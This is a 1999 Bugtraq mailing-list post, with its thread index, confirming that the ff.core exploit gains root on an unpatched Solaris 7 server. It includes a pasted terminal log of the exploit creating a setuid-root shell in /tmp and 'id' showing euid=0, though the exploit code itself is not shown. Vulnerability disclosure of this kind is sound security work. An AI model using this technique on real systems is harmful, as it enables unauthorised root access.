Bugtraq mailing list archives
ff.core exploit on Solaris (2.)7
From: dfrasnel () CSEE WVU EDU (Daniel J. Frasnelli)
Date: Fri, 8 Jan 1999 12:43:20 -0500
Greetings, Confirmed ff.core exploit does exist in Solaris 7, server edition. System is straight installation, no patches of any category available for 7 from Sunsolve yet. Daniel (12:32,99-01-08) (dfrasnel@rogue)[~]> uname -spr SunOS 5.7 sparc (12:34,99-01-08) (dfrasnel@rogue)[~]> ./test Testing if exploit is possible... Test successful. Proceeding... Backing up clobbered files to /tmp/.bk Doing sploit... Done with sploit. Testing and trying to clean up now... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Connection closed by foreign host. w00p! Should have a suid root sh in /tmp/bob btw, its rksh because solaris is silly Let me try to clean up my mess... everything should be cool.. i think :> # ls -la /tmp/bob -rwsr-xr-x 1 root root 192764 Jan 8 12:32 /tmp/bob # id (snip) euid=0(root)
Current thread:
- setuid vs. setgid (was Re: Anonymous Qmail Denial of Service), (continued)
- setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Ian R. Justman (Jan 06)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Darren Reed (Jan 08)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Nick Maclaren (Jan 08)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Mark Crosbie (Jan 09)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Pete Kruckenberg (Jan 09)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Thamer Al-Herbish (Jan 09)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Len Budney (Jan 08)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Thamer Al-Herbish (Jan 08)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Kragen Sitaker (Jan 09)
- Re: setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Darren Reed (Jan 08)
- setuid vs. setgid (was Re: Anonymous Qmail Denial of Service) Ian R. Justman (Jan 06)
- ff.core exploit on Solaris (2.)7 Daniel J. Frasnelli (Jan 08)
- Re: ff.core exploit on Solaris (2.)7 Casper Dik (Jan 15)
- L0pht tmp tool and (mini) Advisory Dr. Mudge (Jan 08)
- Re: Anonymous Qmail Denial of Service Wietse Venema (Jan 10)
- Keeping Solaris up-to-date John RIddoch (Jan 11)
- Keeping any up-to-date? Randolf-Heiko Skerka (Jan 13)
- Re: Keeping any up-to-date? Ciaran Deignan (Jan 15)
- Re: Keeping any up-to-date? Peter May (Jan 15)